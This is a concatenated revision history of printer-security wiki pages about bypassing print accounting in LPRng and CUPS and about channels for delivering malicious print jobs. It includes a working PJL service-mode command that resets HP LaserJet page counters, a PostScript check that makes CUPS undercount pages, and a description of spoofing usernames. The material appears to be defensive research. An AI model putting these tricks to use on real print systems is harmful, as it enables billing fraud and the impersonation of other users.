printer. For CUPS, this is done done by setting the content type to <code>application/vnd.cups-raw</code>. If your system is already configured to use the print server to be tested, simply use: <code>lp -o raw test.ps</code>. '''Who can perform this attack?''' Any anyone who forward jobs to the (CUPS based) print server. (However it deserves to be mentioned that only a local attacker has an actual benefit of free hard copies.) <!-- % number of copies vs. density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> ---- 8df3f6429cc5eaad3b53b895928a6edd57ab6677 51 49 2017-01-05T15:32:48Z 134.147.128.156 0 wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode. This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. At the end of the document to be printed and separated by the [UEL], the counter simply has to be reset to its original value (for example, <code>2342</code>): \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. === Software page counters === CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists (which will return ''false'' when interpreted in CUPS/Ghostscript) before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter. <!-- Manipulating hardware page counters with PJL or tricking software page counters with PostScript can be performed in all defined attacker models, however it deserves to be mentioned that only a local attacker (AM1) has an actual benefit of free hard copies. % number of copies vs. density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> also: can we overwrite the pagecounter operator? 01ea18bcfb43dd93073b63e16905874f04c6cceb 49 48 2017-01-05T14:57:51Z 134.147.128.156 0 wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following we discuss both options for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>Deußen, J., ''Counting Pages in Printer Data Streams'', (2011), \url{http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf}.</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>Powell, P., ''Printer Accounting Reality Check'', (1995), http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html.</ref>. Such hardware page counters are supported by most printers read by LPRng using PJL after every print job. HP has even documented a feature to write to the page counter variable <ref>HP Inc., ''HP LaserJet Family Quick Reference Service Guide'', (1999), \url{https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf}.</ref>. By setting the printer into service mode as previously explained we were able to manipulate the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'', ''HP LaserJet 4250N''. At the end of the document to be printed and separated by the \acs{UEL}, the counter simply has to be reset to its original value (<code>2342</code>). Resetting the page counter on HP LaserJets: \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. === Software page counters === %CUPS create document containing more pages or higher density than analyzed by CUPS. Below we will briefly discuss how LPRng and CUPS try to solve the problem of accounting. % PostScript has access read access to the page counter, however on none of the devices we were able to set this value. CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. In our tests, CUPS only accounted for one page – which seems to be a hardcoded minimum – while the real job can be hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter before it reaches the page counter. <!-- Manipulating hardware page counters with PJL or tricking software page counters with PostScript can be performed in all defined attacker models, however it deserves to be mentioned that only a local attacker (AM1) has an actual benefit of free hard copies. % number of copies vs. density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> also: can we overwrite the pagecounter operator? 2b710af742dcaf363c1490cff1b0d101e7ae7909 48 44 2017-01-05T14:49:35Z 134.147.128.156 0 wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following we discuss both options for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>Deußen, J., ''Counting Pages in Printer Data Streams'', (2011), \url{http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf}.</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>Powell, P., ''Printer Accounting Reality Check'', (1995), http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html.</ref>. Such hardware page counters are supported by most printers read by LPRng using PJL after every print job. HP has even documented a feature to write to the page counter variable <ref>HP Inc., ''HP LaserJet Family Quick Reference Service Guide'', (1999), \url{https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf}.</ref>. By setting the printer into service mode as previously explained we were able to manipulate the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'', ''HP LaserJet 4250N''. At the end of the document to be printed and separated by the \acs{UEL}, the counter simply has to be reset to its original value (<code>2342</code>). Resetting the page counter on HP LaserJets: <syntaxhighlight lang=pjl> \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ </syntaxhighlight> Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. === Software page counters === %CUPS create document containing more pages or higher density than analyzed by CUPS. Below we will briefly discuss how LPRng and CUPS try to solve the problem of accounting. % PostScript has access read access to the page counter, however on none of the devices we were able to set this value. CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. In our tests, CUPS only accounted for one page – which seems to be a hardcoded minimum – while the real job can be hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter before it reaches the page counter. <!-- Manipulating hardware page counters with PJL or tricking software page counters with PostScript can be performed in all defined attacker models, however it deserves to be mentioned that only a local attacker (AM1) has an actual benefit of free hard copies. % number of copies vs. density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> also: can we overwrite the pagecounter operator? 1dc74505f0a1b7f3406a9021ea9448ad1fe7d967 44 2017-01-05T14:13:26Z Admin 1 Created page with "Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to..." wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following we discuss both options for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>Deußen, J., ''Counting Pages in Printer Data Streams'', (2011), \url{http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf}.</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>Powell, P., ''Printer Accounting Reality Check'', (1995), http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html.</ref>. Such hardware page counters are supported by most printers read by LPRng using PJL after every print job. HP has even documented a feature to write to the page counter variable <ref>HP Inc., ''HP LaserJet Family Quick Reference Service Guide'', (1999), \url{https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf}.</ref>. By setting the printer into service mode as previously explained we were able to manipulate the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'', ''HP LaserJet 4250N''. At the end of the document to be printed and separated by the \acs{UEL}, the counter simply has to be reset to its original value (<code>2342</code>). Resetting the page counter on HP LaserJets: <syntaxhighlight lang=pjl> \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ </syntaxhighlight> Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. === Software page counters === %CUPS create document containing more pages or higher density than analyzed by CUPS. Below we will briefly discuss how LPRng and CUPS try to solve the problem of accounting. % PostScript has access read access to the page counter, however on none of the devices we were able to set this value. CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. In our tests, CUPS only accounted for one page – which seems to be a hardcoded minimum – while the real job can be hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter before it reaches the page counter. % The CUPS method is XXX. This requires server-side user management which is hard to maintain or access to some kind of LDAP database which might be a security risk for itself. Therefore it seems many configurations simply trust the given username from the client-side print job input. In a quick test at the RUB data center and various computer pools, we could see that user identification was not configured with any authentication, allowing us to impersonate any user.\\ Manipulating hardware page counters with PJL or tricking software page counters with PostScript can be performed in all defined attacker models, however it deserves to be mentioned that only a local attacker (AM1) has an actual benefit of free hard copies. % number of copies vs. density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html also: can we overwrite the pagecounter operator? 122e65be6b1b20b59012afe76a9b2433bba1e388 0 66 567 301 2017-02-08T09:58:30Z 92.228.38.179 0 wikitext text/x-wiki [[File:Deployment-channels.png|thumb|Overview of channels to deploy a (malicious) print job]] Various channels like [[USB]], [[LPD]], [[IPP]], [[SMB]], or [[raw]] port 9100 printing can be used as carriers to deploy malicious print jobs. While it is possible the attack [[Fundamentals#Network_printing_protocols|printing protocols]] themselves, most attacks discussed in this wiki are targeted for the [[PostScript]] and [[PJL]] interpreters. The payload is just routed by any of the printing channels. This is important to note because it means '''whenever the attacker can somehow ‘print’ she can attack and exploit those interpreters'''. [[File:Printing-overview.png|400px|Attack the interpreters, not the printing channels]] This fact makes it very harder for the blue team ([[Countermeasures#Admins|network administrators]], for example) to defend against printer attacks. Many devices even allow printing (and therefore exploitation) by uploading a raw file to the printer's [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] service or to a form on the embedded web server. To get an impression, an overview of printing channels supported by various printer models is given below. {| class="wikitable" style="text-align:center" |+ Malicious print job deployment channels |- ! Printer model !! LPD !! IPP !! Raw !! Web !! FTP !! SMB !! USB |- | style="text-align:left;" | HP LaserJet 1200 || ✔ || || ✔ || || || || |- | style="text-align:left;" | HP LaserJet 4200N || ✔ || ✔ || ✔ || || ✔ || || |- | style="text-align:left;" | HP LaserJet 4250N || ✔ || ✔ || ✔ || ✔ || ✔ || || ✔ |- | style="text-align:left;" | HP LaserJet P2015dn || ✔ || || ✔ || || || ✔ || ✔ |- | style="text-align:left;" | HP LaserJet M2727nfs || ✔ || || ✔ || || || ✔ || ✔ |- | style="text-align:left;" | HP LaserJet 3392 AiO || ✔ || || ✔ || || || ✔ || ✔ |- | style="text-align:left;" | HP Color LaserJet CP1515n || ✔ || || ✔ || || || || ✔ |- | style="text-align:left;" | Brother MFC-9120CN || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Brother DCP-9045CDN || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Lexmark X264dn || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Lexmark E360dn || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Lexmark C736dn || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Dell 5130cdn || ✔ || ✔ || ✔ || || ✔ || ✔ || ✔ |- | style="text-align:left;" | Dell 1720n || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Dell 3110cn || ✔ || || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Kyocera FS-C5200DN || ✔ || || ✔ || || ✔ || ✔ || ✔ |- | style="text-align:left;" | Samsung CLX-3305W || ✔ || ✔ || ✔ || || || || ✔ |- | style="text-align:left;" | Samsung MultiPress 6345N || ✔ || ✔ || ✔ || ✔ || || || ✔ |- | style="text-align:left;" | Konica bizhub 20p || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | OKI MC342dn || ✔ || ✔ || ✔ || ✔ || ✔ || ✔ || ✔ |- | style="text-align:left;" | Konica bizhub C454e || ✔ || ✔ || ✔ || ✔ || || ✔ || ✔ |- |} It must be noted that these are not the only possible attack scenarios. For example using social engineering to make a victim print a malicious document is not even covered in this wiki yet – neither are new methods to deploy (potentially malicious) print jobs like [https://en.wikipedia.org/wiki/Cloud_printing cloud printing] or [https://webbluetoothcg.github.io/web-bluetooth/ Web Bluetooth]. == Attacker Models == A '''physical attacker''' has the capability to print documents from USB stick or via USB/parallel cable. An (wired or wireless) attacker connecting through a '''TCP/IP network''' can deploy print jobs over LPD, IPP, port 9100/tcp, FTP, SMB and the embedded web server. Under the assumption that no strong user authentication like smart card based access control or SSL client certificates is enforced, both attacker models do obviously have a channel to print which is the precondition for further attacks to be carried out. Both are certainly quite strong attacker models because they require direct access – either physical or logical – to the device. However, in penetration testing scenarios where sneaking into the building is not an option and the printer is not directly reachable over the internet, other deployment channels are required. In such cases, the '''victim's web browser''' can be used as a carrier for printer malware as discussed in [[cross-site printing]]. → ''Related articles:'' [[USB drive or cable]], [[Port 9100 printing]], [[Cross-site printing]] 24ac8dea0ce4a49d97804152fa02e122c6dc7389 301 287 2017-01-31T08:00:26Z 84.153.135.37 0 wikitext text/x-wiki [[File:Deployment-channels.png|thumb|Overview of channels to deploy a (malicious) print job]] Various channels like [[USB]], [[LPD]], [[IPP]], [[SMB]], or [[raw]] port 9100 printing can be used as carriers to deploy malicious print jobs. While it is possible the attack [[Fundamentals#Network_printing_protocols|printing protocols]] themselves, most attacks discussed in this wiki are targeted for the [[PostScript]] and [[PJL]] interpreters. The payload is just routed by any of the printing channels. This is important to note because it means '''whenever the attacker can somehow ‘print’ she can attack and exploit those interpreters'''. [[File:Printing-overview.png|400px|Attack the interpreters, not the printing channels]] This fact makes it very harder for the blue team ([[Countermeasures#Admins|network administrators]], for example) to defend against printer attacks. Many devices even allow printing (and therefore exploitation) by uploading a raw file to the printer's [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] service or to a form on the embedded web server. To get an impression, an overview of printing channels supported by various printer models is given below. {| class="wikitable" style="text-align:center" |+ Malicious print job deployment channels |- ! Printer model !! LPD !! IPP !! Raw !! Web !! FTP !! SMB !! USB |- | style="text-align:left;" | HP LaserJet 1200 || ✔ || || ✔ || || || || |- | style="text-align:left;" | HP LaserJet 4200N || ✔ || ✔ 